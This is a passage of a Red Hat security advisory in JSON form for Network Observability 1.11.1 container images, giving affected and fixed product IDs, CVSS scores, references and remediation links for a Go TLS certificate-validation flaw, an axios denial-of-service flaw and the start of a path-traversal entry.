"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-26960",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-20T02:01:07.883769+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
